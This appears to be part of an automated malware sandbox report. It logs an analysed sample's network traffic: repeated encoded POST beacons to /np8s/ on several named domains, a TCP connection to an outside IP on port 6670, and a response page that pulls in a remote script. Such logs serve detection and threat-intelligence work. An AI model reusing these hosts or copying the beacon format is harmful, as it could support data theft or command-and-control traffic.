zVB=hbQjEd7OUs1xlaFU6QGP1s3D3o95fQZX30BaslRltocEAh1uMgoEPFUaOKMckjNyDk~bDyhOfYQsFeR6xWU3CR9WFQhugjH7kh6UbtxZT2RgLQucYSOXJ5UuFXij(gacsLYJJIY6NU4OTtlS95wp6iUgdMlwKFdwyscPLPO98_Pgpa3VYgWmZlFAoOxv(ljK68QKj_TxCfIeaBqlfUYV58TKGC0MoRqISprV6FTwBWiD58BODaCM~lhEocEzFfzCTcXflNOq4NatzDQHCCsArD40I4jleVfXy7XSz3JrtNW3WaT9vYixrH1sMD6zjEVYTQlQ7cKGIoghdgKMkAhLlQlir4Iq~00fNACcq7(BxlVNC32I4qoUutDhkQ6bMzfxLeDFC5gypBlWSLD8pw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 59 54 69 62 5f 78 73 37 61 4a 6e 33 46 53 62 36 38 6e 37 31 59 34 6f 54 79 74 55 6d 32 70 4f 69 46 67 56 73 70 6b 6b 48 53 42 50 49 6e 6c 52 50 42 5a 2d 4b 5f 6b 59 33 54 42 7a 44 6b 33 36 44 79 6c 4f 65 59 49 61 46 2d 68 45 79 31 73 30 45 78 39 6d 45 51 68 4e 6b 6e 48 47 6b 68 75 36 62 74 35 7a 54 6d 64 67 4e 7a 47 63 4d 68 6d 63 55 4a 55 6b 5a 48 79 5f 69 77 47 72 73 4c 51 72 4a 49 6b 36 4f 6b 30 4f 56 4e 31 64 32 61 59 6d 39 79 55 68 58 73 6c 70 54 56 67 4a 79 73 49 74 4c 4f 79 39 39 4e 62 67 34 61 58 56 61 52 57 6e 57 31 46 5a 73 4f 78 75 37 6c 28 62 36 38 4d 4f 6a 37 71 47 43 4f 38 65 49 68 71 67 59 47 35 71 71 37 48 5a 45 43 42 63 6f 52 6d 74 63 64 79 54 36 42 43 72 58 54 76 37 37 65 70 77 44 59 75 6d 79 6c 68 41 39 73 46 6e 46 66 79 5f 54 63 58 68 6c 4e 65 71 34 4c 61 74 7a 58 38 48 45 48 34 42 30 6a 34 78 4d 34 6a 33 61 56 6a 76 79 36 28 6f 7a 32 6c 37 71 36 6d 33 58 50 37 39 6e 62 4b 79 77 48 30 70 42 6a 36 52 7e 30 55 50 54 51 6c 32 37 64 4b 6f 49 2d 6b 68 50 46 6d 4d 6a 6d 56 4c 70 41 6c 69 6b 59 49 73 72 45 34 50 4e 41 61 59 71 37 50 72 78 57 35 4e 42 6c 7e 49 37 4c 6f 55 39 4e 44 68 6f 77 37 5a 66 6a 7a 31 4f 38 37 44 42 5a 56 4e 30 67 30 41 55 34 4f 79 35 6d 30 67 71 48 30 47 4b 57 50 51 37 77 6f 37 4f 4b 45 62 79 49 28 36 4e 41 4e 6d 6d 57 68 41 71 49 37 56 55 47 76 78 4a 6d 76 55 54 58 39 42 72 79 63 47 56 39 34 65 37 6c 45 44 49 69 37 5a 64 44 76 59 43 41 52 39 39 4f 4f 2d 61 75 7e 47 6b 68 63 77 5a 32 6e 5a 57 34 43 32 52 78 41 44 68 65 4e 66 38 31 76 70 69 61 52 78 52 42 53 72 58 6c 66 68 73 6e 39 53 47 37 32 74 51 35 33 36 6b 50 6b 68 36 6b 73 59 7a 2d 30 48 43 45 55 4c 63 52 48 6f 7a 6a 58 63 4d 45 6f 75 70 36 48 4d 72 44 71 59 6c 4e 49 6c 51 38 63 43 6d 32 51 44 4b 52 47 66 74 6e 62 63 6e 4b 32 55 67 6a 47 70 4e 33 4d 37 6d 42 38 4f 77 53 64 7a 30 69 46 73 4a 70 70 6f 64 45 47 4a 6a 69 36 4a 64 43 4e 6e 70 7a 71 69 62 66 4f 4f 53 67 69 33 56 54 68 37 6f 76 4e 4b 68 5f 73 42 66 34 33 6e 4e 4d 35 34 4b 38 75 66 61 44 41 6d 73 64 62 62 31 57 36 54 53 67 6f 4d 71 75 64 66 28 77 59 2d 6a 72 48 65 4b 33 6a 6c 57 6e 65 39 74 2d 45 77 30 58 66 53 74 4b 61 70 6c 34 4b 6b 4d 59 76 69 43 5f 7e 75 72 45 64 48 63 71 56 44 6b 4b 4f 56 4f 6d 42 41 54 47 4c 37 59 30 35 68 61 77 5a 55 32 74 61 38 6d 4f 50 58 4f 58 47 64 67 33 46 4e 49 51 46 65 30 2d 5a 45 6b 74 6e 57 65 45 30 78 6a 31 78 76 39 39 56 6d 4d 76 55 6c 71 6b 56 6f 63 6f 4b 43 6d 58 78 67 44 59 4d 34 62 73 4a 44 4c 51 37 55 30 6a 4d 6d 61 6b 6c 6e 74 6e 32 78 33 4c 79 7a 45 44 64 4b 4a 35 69 57 49 39 57 6a 44 46 6f 64 4e 4f 61 58 32 43 31 64 77
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 42 43 6b 47 48 6c 45 74 28 69 41 49 73 62 79 4d 43 49 54 4c 48 75 7e 4f 39 6b 6b 73 45 30 56 74 4f 75 70 6b 66 30 4b 53 4e 56 55 4e 73 74 44 44 57 6f 44 62 48 6d 4e 42 7e 67 72 55 72 68 4f 4a 67 36 78 71 78 43 75 38 65 42 61 63 38 68 54 6f 54 65 61 79 54 37 36 31 44 70 78 70 44 74 4f 6e 71 7a 54 45 6f 4c 64 56 68 54 72 38 70 76 45 67 50 59 7e 4f 39 69 38 61 6a 30 68 37 28 39 6d 56 55 5a 5a 70 74 47 6b 49 77 45 44 5a 74 45 39 49 78 42 67 41 37 5f 33 38 6c 62 4d 75 41 4b 67 7a 67 42 4c 65 68 55 5a 4e 57 57 48 6f 4d 51 6a 6d 44 5f 5a 52 72 47 35 70 28 75 7e 36 4a 46 43 63 32 53 39 46 64 52 4a 76 76 39 62 33 72 45 69 56 4e 65 28 51 6c 38 75 64 41 5f 6d 74 72 38 72 4a 39 63 48 4c 4b 4a 38 6a 78 34 55 53 45 4c 70 6b 58 55 62 5f 73 57 72 32 6e 44 38 39 72 47 6c 30 6f 4d 4b 33 63 38 55 64 75 43 36 55 45 62 74 4d 46 5a 54 7a 77 35 69 4f 75 4e 4d 50 76 77 46 43 46 51 7a 6f 62 4e 51 4e 55 4c 4f 32 36 55 75 51 4b 69 33 47 79 75 59 6c 77 76 69 6f 62 61 32 33 31 73 57 39 4e 4a 54 77 6f 48 78 72 61 4f 79 6c 38 49 72 35 70 45 7a 6c 71 45 76 79 45 43 4e 6c 4e 41 39 77 68 49 6f 54 48 44 7e 72 4e 34 37 4a 39 4d 36 5f 37 45 38 6c 42 4a 48 6e 35 31 49 4e 4f 41 6d 53 4d 48 31 30 31 35 58 4e 63 43 6e 30 38 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=BCkGHlEt(iAIsbyMCITLHu~O9kksE0VtOupkf0KSNVUNstDDWoDbHmNB~grUrhOJg6xqxCu8eBac8hToTeayT761DpxpDtOnqzTEoLdVhTr8pvEgPY~O9i8aj0h7(9mVUZZptGkIwEDZtE9IxBgA7_38lbMuAKgzgBLehUZNWWHoMQjmD_ZRrG5p(u~6JFCc2S9FdRJvv9b3rEiVNe(Ql8udA_mtr8rJ9cHLKJ8jx4USELpkXUb_sWr2nD89rGl0oMK3c8UduC6UEbtMFZTzw5iOuNMPvwFCFQzobNQNULO26UuQKi3GyuYlwvioba231sW9NJTwoHxraOyl8Ir5pEzlqEvyECNlNA9whIoTHD~rN47J9M6_7E8lBJHn51INOAmSMH1015XNcCn08g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 42 43 6b 47 48 6e 51 37 78 32 77 56 78 62 50 73 57 65 58 66 50 5f 75 4d 78 30 6f 6a 61 47 51 74 4b 61 74 61 41 68 32 6a 63 67 51 62 6f 64 65 54 53 75 58 54 48 6e 38 6c 77 7a 50 75 76 42 4b 4b 67 37 56 55 78 43 71 38 66 41 79 4d 38 47 66 4f 55 38 69 39 52 62 36 4a 45 70 77 76 56 63 53 4b 71 7a 57 52 6f 4c 45 4b 68 6a 48 38 6f 4e 38 67 4a 5a 7e 4a 69 53 38 44 67 30 52 6e 37 39 72 48 55 5a 42 68 74 43 6b 49 78 30 50 5a 33 6b 74 4a 6d 57 4d 44 6a 5f 32 58 7a 4c 4d 4e 4f 71 6c 41 67 42 48 77 68 52 35 4e 57 41 76 6f 44 67 44 6d 49 75 5a 53 7e 6d 35 73 73 2d 7e 6a 4e 46 50 45 32 53 52 5a 64 56 52 56 75 49 62 33 6c 55 69 59 63 5f 37 75 75 39 75 30 43 5f 53 61 72 39 58 6b 39 4e 71 59 4b 4c 35 47 6e 36 4d 70 59 2d 31 65 58 52 4c 42 76 32 71 5f 76 6a 38 71 72 47 6c 45 6f 4d 4b 5a 63 39 6b 64 75 44 79 55 46 49 46 4d 48 61 36 6c 76 5a 69 4c 71 4e 4d 72 7e 67 5a 75 46 51 71 6d 62 4d 39 49 55 37 69 32 37 45 53 51 65 33 72 48 77 75 59 6a 67 5f 69 67 66 61 32 34 31 73 57 4c 4e 49 53 74 76 30 31 72 49 76 79 6c 73 61 44 35 6c 55 7a 6c 6d 6b 76 77 4c 69 42 50 4e 41 31 38 68 49 5a 6d 48 77 53 72 49 36 44 4a 7a 4a 61 5f 34 30 38 6c 4f 70 48 35 32 30 52 42 47 77 75 5f 4c 6e 30 44 70 61 43 36 53 47 76 5f 67 75 48 56 41 34 78 5a 4d 6f 70 2d 31 65 47 35 79 72 55 52 33 54 56 69 4b 78 7e 4c 75 5f 35 4d 67 6d 58 36 43 58 69 31 38 4b 52 4e 73 48 6f 56 49 73 4b 46 4c 4a 68 42 68 73 31 4f 58 6f 7e 67 76 53 53 77 55 65 68 52 71 73 71 67 49 58 32 5a 4e 6b 77 6c 7a 69 43 6b 52 6c 49 77 39 61 45 43 55 61 7a 30 41 50 70 73 41 57 70 47 6d 55 64 39 74 53 44 33 54 6e 74 38 6a 63 58 43 41 78 6e 48 47 63 4c 30 54 63 69 53 68 64 4d 6f 31 44 55 57 64 51 71 41 54 41 53 63 7e 74 7e 69 77 59 47 46 4a 76 32 79 68 41 6b 6e 41 76 58 5a 73 57 28 4b 53 71 57 4d 64 68 57 78 4f 59 6c 74 5a 30 55 41 71 48 45 6f 46 73 76 74 6c 6a 54 31 43 71 7a 2d 50 6b 53 4f 28 4c 47 74 65 34 41 6e 39 66 6d 4d 69 71 79 52 68 6c 6f 42 6e 36 56 74 76 6a 7e 47 7a 75 69 6e 78 54 58 78 61 4d 64 54 36 47 62 35 36 4b 63 57 49 49 62 74 28 37 5a 4f 79 71 71 68 57 67 5a 4c 6c 6b 75 77 44 32 66 78 70 37 31 51 68 61 74 41 6a 2d 4f 6c 4b 38 30 67 74 31 7e 54 77 70 42 61 47 69 61 53 50 74 36 41 63 41 35 32 36 2d 63 38 28 67 7a 43 41 76 6a 49 4c 69 78 51 61 33 43 6f 6a 6e 4b 64 5a 59 50 4d 46 45 6e 50 73 74 63 36 28 61 48 73 73 66 4b 68 45 30 53 79 59 4b 28 31 66 55 55 55 38 66 57 4c 6d 34 70 63 71 47 39 6f 36 5f 4a 39 75 2d 76 5a 45 6a 4e 33 37 61 4a 4a 69 75 46 74 38 5f 79 6d 73 6e 54 4b 78 67 66 2d 58 63 44 6d 56 39 4b 61 43 74 47 51 76 58 38 55 65 71 79 69 59 52 75 4a 4e 4f 32 43 4e 67 79 4e 6c 69 59 64 65 4c 79 4a 35 4e
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 78 33 62 6f 4f 32 30 54 63 6b 62 46 62 45 58 79 63 37 47 52 61 54 64 70 54 53 62 71 63 39 4c 5a 48 34 58 45 31 76 79 51 34 6a 76 47 62 61 4d 2d 38 79 31 62 64 76 59 67 48 50 49 74 35 69 6b 75 55 4e 54 53 31 5a 78 49 50 46 34 48 39 54 56 6b 69 36 6c 49 52 36 79 70 7e 4b 61 69 73 52 73 67 39 65 47 39 34 30 51 4b 7a 46 44 61 47 63 44 73 53 70 33 42 73 4d 39 36 77 37 33 5a 42 71 33 4a 79 38 72 71 32 46 79 30 4f 71 79 41 31 52 79 4d 39 57 35 77 73 55 28 56 44 52 4a 64 41 73 28 6d 62 64 69 63 28 64 70 53 35 56 47 42 63 39 41 2d 55 6f 6f 35 45 58 4f 57 68 33 70 59 63 71 67 70 72 6f 4f 38 38 2d 45 56 50 37 7a 4c 41 47 31 46 66 63 37 56 78 4a 63 50 75 35 38 63 72 49 77 77 46 68 77 39 55 6b 35 62 41 7a 76 4f 70 53 56 38 41 44 4f 5f 43 33 51 43 59 36 37 33 34 6b 70 54 57 73 56 2d 31 4a 66 34 4c 49 79 4f 7e 2d 61 77 65 6b 72 38 42 34 66 4d 44 74 71 6e 35 77 37 4a 76 4a 52 6b 62 78 71 75 6a 30 33 6c 61 56 36 6d 50 69 46 6d 6f 75 55 5f 66 6d 4e 51 43 73 34 4f 34 78 5a 4c 6d 6c 59 31 68 32 4d 59 6c 63 71 41 73 70 4c 76 76 7a 4d 38 31 51 34 46 64 35 43 4b 54 4a 75 38 50 38 54 74 32 78 4c 50 4a 47 42 58 4d 36 52 47 6c 68 6b 64 41 5a 59 39 28 68 68 36 47 55 32 59 35 68 37 30 69 39 71 6d 66 53 7e 68 6b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=x3boO20TckbFbEXyc7GRaTdpTSbqc9LZH4XE1vyQ4jvGbaM-8y1bdvYgHPIt5ikuUNTS1ZxIPF4H9TVki6lIR6yp~KaisRsg9eG940QKzFDaGcDsSp3BsM96w73ZBq3Jy8rq2Fy0OqyA1RyM9W5wsU(VDRJdAs(mbdic(dpS5VGBc9A-Uoo5EXOWh3pYcqgproO88-EVP7zLAG1Ffc7VxJcPu58crIwwFhw9Uk5bAzvOpSV8ADO_C3QCY6734kpTWsV-1Jf4LIyO~-awekr8B4fMDtqn5w7JvJRkbxquj03laV6mPiFmouU_fmNQCs4O4xZLmlY1h2MYlcqAspLvvzM81Q4Fd5CKTJu8P8Tt2xLPJGBXM6RGlhkdAZY9(hh6GU2Y5h70i9qmfS~hkQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 78 33 62 6f 4f 79 31 49 59 58 66 6d 58 30 61 55 52 70 32 4e 43 7a 74 72 66 43 66 6c 5a 38 57 48 4e 70 6e 36 78 74 37 6d 37 6a 6e 6d 52 4b 51 66 33 54 68 44 64 76 6f 5a 63 74 39 71 75 79 67 74 55 4e 72 38 31 5a 6c 49 4f 47 49 58 36 30 5a 65 69 5a 4e 50 63 36 79 56 39 4b 61 42 36 53 70 41 39 66 58 53 34 30 59 61 30 31 76 61 45 2d 4c 73 55 6f 33 4b 7a 63 39 38 76 4c 48 64 46 71 7a 2d 79 38 79 70 32 41 53 30 4f 61 7e 41 30 78 43 54 37 56 52 7a 32 30 28 51 47 52 4a 45 4f 38 79 42 62 63 57 79 28 63 35 53 36 6d 79 42 64 73 67 2d 45 50 63 36 4c 33 4f 54 77 6e 70 76 50 36 6b 34 72 6f 53 67 38 5f 77 76 4d 4b 48 4c 43 32 31 2d 61 50 72 33 37 36 45 69 6f 36 68 38 72 49 39 65 45 77 73 6c 55 67 78 33 51 77 32 6d 33 41 4e 47 41 42 43 46 4f 33 51 47 51 61 36 31 34 6b 6f 6b 57 73 56 41 31 4e 62 34 4c 4c 69 4f 34 2d 4b 77 59 67 4c 5f 65 34 66 4a 48 74 71 6c 39 77 28 70 76 4a 59 35 62 78 47 41 6a 6e 7a 6c 63 41 6d 6d 49 45 5a 6c 39 75 55 31 4d 57 4e 49 50 4d 34 5f 34 78 5a 6c 6d 6b 5a 75 67 46 34 59 6b 4e 71 41 76 50 28 76 71 44 4d 38 37 77 34 48 53 5a 50 52 54 4a 6e 30 50 39 69 50 32 47 37 50 4a 58 68 58 4d 62 52 47 6d 52 6b 64 5a 4a 5a 2d 36 54 35 32 4e 6b 37 53 79 55 79 5a 36 2d 48 49 4c 54 66 32 33 76 42 59 44 69 4c 49 6f 47 77 48 45 77 39 59 4e 63 47 64 50 44 72 2d 70 6f 47 42 47 62 4b 58 6f 77 75 66 61 47 66 70 57 68 72 69 59 44 6f 64 4d 70 42 77 6a 57 79 6c 44 4a 72 4f 76 6f 71 4c 43 76 73 39 55 49 77 38 67 75 36 75 41 59 4b 64 55 59 41 48 53 51 62 4e 56 52 28 62 5a 30 39 50 4e 56 75 48 73 30 39 7a 44 38 57 63 44 7a 5a 52 72 4e 31 47 55 6d 47 4f 4e 77 4d 69 54 6a 33 35 63 45 71 6f 67 4b 68 39 58 62 72 62 45 4f 6e 46 38 37 46 59 77 67 43 4d 37 69 62 5a 66 4b 48 44 4c 6f 73 7a 6b 57 69 44 43 62 33 66 42 4e 41 42 28 44 36 4a 69 37 6a 46 57 5f 44 61 71 2d 70 6d 54 68 61 31 66 66 62 32 44 51 32 38 71 44 39 6a 57 49 77 6e 7a 75 6e 49 70 7a 6c 58 38 48 71 67 63 77 39 52 4a 67 4b 6a 52 70 64 72 71 61 52 66 58 50 28 4b 64 64 5a 2d 52 4f 79 49 30 71 61 4b 70 49 65 6e 7e 2d 49 48 78 42 4f 5f 35 46 7e 48 41 6c 49 59 41 37 54 32 79 75 5a 76 35 71 63 71 6e 6c 33 76 5a 78 43 6e 72 33 33 67 4c 4a 61 46 43 52 48 4b 53 53 41 46 51 79 39 33 42 33 57 34 57 31 51 41 69 5a 70 56 34 56 54 62 79 55 33 73 73 64 6d 66 6f 58 55 48 77 76 33 56 35 41 65 76 59 4f 63 5f 4b 32 53 79 67 76 6d 77 50 48 4c 6a 56 62 50 55 42 55 67 49 67 36 30 74 34 59 77 68 56 6c 46 37 6b 47 30 33 74 34 46 43 78 43 38 43 47 6f 53 37 4d 70 79 46 4b 6d 39 4f 32 4c 36 51 46 58 52 4b 37 6d 4f 4f 34 47 76 34 68 45 74 76 67 5f 53 56 35 35 51 34 4c 72 32 63 73 36 35 70 7e 45 4d 51 44 4e 73 57 51 4e 32 4d 42
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 6a 54 34 6d 34 78 55 56 49 6a 61 73 47 34 71 30 72 6c 77 6d 4a 77 72 34 4a 34 34 74 39 4d 76 34 4b 57 39 74 39 4e 74 79 31 52 38 31 78 74 34 39 46 58 46 37 45 76 32 70 58 42 30 28 41 74 37 69 4b 36 71 49 56 6d 76 39 73 4d 53 73 6e 41 6f 70 2d 56 39 53 42 76 38 56 6d 62 59 35 51 63 55 28 2d 69 69 4b 52 56 62 47 6c 51 6d 4e 68 38 31 4d 4d 43 69 4e 57 39 79 63 45 66 74 49 6e 7e 31 6a 7a 49 58 69 73 76 52 77 69 42 55 49 35 61 67 4c 73 65 51 42 38 72 6d 32 74 66 31 4e 69 62 63 33 2d 4a 73 33 76 37 70 36 4e 43 2d 4f 33 37 67 69 6f 54 58 5a 53 5a 55 7a 5a 35 4e 75 72 72 74 39 4e 31 73 6d 52 32 7a 49 38 44 31 4b 4d 46 31 6f 44 4b 4a 42 6f 54 76 7e 31 70 57 45 35 37 32 42 6e 58 79 67 69 79 73 53 50 4e 42 54 5f 6b 43 6d 51 55 37 54 7a 79 6d 69 47 4c 79 7a 36 76 2d 77 38 52 5f 69 64 4b 54 6f 4e 36 4d 6f 5f 45 32 33 4c 50 4e 31 62 47 73 58 4d 4e 6b 4f 50 67 57 32 69 6a 6c 70 51 77 2d 6e 50 39 51 36 48 68 72 63 50 77 6f 53 41 71 74 6f 37 62 64 44 71 56 50 35 74 30 49 6b 56 67 31 41 36 48 4d 73 7a 59 6d 55 38 4a 66 30 43 66 38 52 59 6e 76 64 62 6a 78 47 77 72 4b 41 6b 49 7a 6f 6b 41 6f 4c 6d 39 59 49 34 67 5f 4c 79 41 34 76 4f 55 52 39 4f 75 58 44 32 7a 79 53 51 78 4a 46 47 6d 48 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=S9TWzjT4m4xUVIjasG4q0rlwmJwr4J44t9Mv4KW9t9Nty1R81xt49FXF7Ev2pXB0(At7iK6qIVmv9sMSsnAop-V9SBv8VmbY5QcU(-iiKRVbGlQmNh81MMCiNW9ycEftIn~1jzIXisvRwiBUI5agLseQB8rm2tf1Nibc3-Js3v7p6NC-O37gioTXZSZUzZ5Nurrt9N1smR2zI8D1KMF1oDKJBoTv~1pWE572BnXygiysSPNBT_kCmQU7TzymiGLyz6v-w8R_idKToN6Mo_E23LPN1bGsXMNkOPgW2ijlpQw-nP9Q6HhrcPwoSAqto7bdDqVP5t0IkVg1A6HMszYmU8Jf0Cf8RYnvdbjxGwrKAkIzokAoLm9YI4g_LyA4vOUR9OuXD2zySQxJFGmHsg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 69 75 7a 6f 6f 73 43 62 34 28 35 71 78 6f 2d 67 72 31 49 6c 35 30 30 32 6f 55 6a 37 66 6b 64 32 76 72 50 75 38 6b 77 6a 57 30 65 6a 44 64 67 39 46 48 67 33 57 62 36 34 6e 46 31 28 41 45 71 69 4b 32 71 4a 57 58 6b 7e 4e 63 30 74 46 59 70 72 65 56 46 54 42 75 34 52 6e 47 49 35 54 77 71 28 39 43 79 4b 43 52 62 46 44 63 6d 63 53 6b 45 50 73 43 6b 46 32 74 75 42 30 54 4b 49 6a 62 6f 6a 32 6f 58 69 63 6a 52 28 6a 78 56 41 65 4f 6e 66 73 66 61 58 73 72 37 73 64 6a 4c 4e 6b 48 45 33 5f 31 73 77 64 66 70 36 5a 79 2d 49 41 75 32 70 34 54 65 64 53 5a 54 6c 70 38 54 75 76 4c 70 39 4d 78 38 68 6a 71 7a 4c 73 44 6f 41 37 34 56 35 67 54 4c 53 6f 6e 49 7e 31 74 37 46 74 36 6c 42 6d 4b 68 32 6e 32 35 57 74 56 34 54 39 6f 6b 6b 77 55 6e 63 54 79 39 69 47 4c 43 7a 36 75 64 77 38 4e 5f 69 63 53 54 6e 39 4b 4d 35 74 64 67 31 37 50 55 28 37 47 79 54 4d 77 5f 4f 50 35 39 32 67 58 50 70 41 4d 2d 31 71 68 51 79 44 42 6f 4a 50 78 74 54 41 72 77 31 72 62 6b 44 71 55 69 35 76 64 4e 6b 43 6f 31 41 72 48 4d 76 52 41 6d 54 63 4a 66 78 43 66 69 66 34 71 6b 64 62 37 74 47 77 62 61 41 53 45 7a 6f 31 67 6f 4c 43 70 59 4c 49 67 5f 53 69 42 7a 76 63 39 65 36 39 32 63 4a 56 69 4b 4e 52 70 62 47 31 6a 34 34 46 49 51 28 68 62 42 59 33 70 57 39 42 6b 72 7e 65 78 36 52 4a 69 6f 7a 4e 79 57 36 30 66 67 54 38 41 52 61 72 76 36 76 4b 57 79 67 42 49 31 47 73 34 65 77 45 55 68 4a 52 7a 62 46 49 57 31 64 56 6a 2d 63 6f 64 4a 55 31 6c 42 65 79 70 4e 51 55 39 36 4d 4d 36 33 71 37 6c 4c 73 4c 7e 44 5a 4b 50 30 55 42 44 30 49 61 33 34 79 78 7a 4f 33 75 34 76 54 57 39 52 39 4f 6b 64 33 71 47 66 58 55 74 39 37 2d 53 30 51 57 58 52 38 50 48 6a 45 6b 4c 69 59 62 4d 4b 56 35 69 6c 61 4b 63 56 48 58 49 56 58 58 79 33 53 69 72 33 63 73 57 4c 69 70 70 4e 6e 42 64 69 38 6d 43 31 75 6e 43 49 53 70 54 6c 4f 6e 63 48 48 72 6c 4e 46 63 4c 68 47 51 4b 58 43 67 4f 71 47 63 30 55 4f 72 6d 63 49 65 34 74 56 6e 52 6d 76 59 54 30 66 47 6c 61 77 53 4b 4a 36 67 54 66 34 59 50 48 72 38 7a 71 7a 36 48 44 61 47 41 50 49 65 49 32 68 39 48 4d 44 62 4a 36 4a 31 41 6c 54 32 72 58 57 4f 56 49 72 41 4d 4d 66 48 7e 6d 69 6f 53 6a 36 69 44 4a 51 50 50 36 74 47 79 36 47 58 67 51 7e 2d 57 42 48 45 72 65 30 6b 75 32 4b 6e 4d 44 31 51 47 63 55 69 54 65 78 75 28 49 6a 64 65 56 56 6a 69 58 5a 6c 41 57 61 47 53 42 79 69 4b 4e 6b 33 55 68 72 41 35 73 55 73 7a 66 74 77 47 37 4c 6a 71 41 37 6f 62 4a 6c 44 79 66 46 6d 47 55 4a 75 34 4d 41 33 56 30 39 78 6f 58 6a 6d 33 49 74 47 77 52 59 6a 6f 5a 53 39 34 70 70 46 6d 4a 50 67 7a 61 36 36 59 6e 39 4c 63 70 73 52 64
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49736 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:42:49 GMTServer: nginx/1.19.10Content-Type: text/htmlContent-Length: 583Last-Modified: Tue, 15 Mar 2022 21:44:23 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 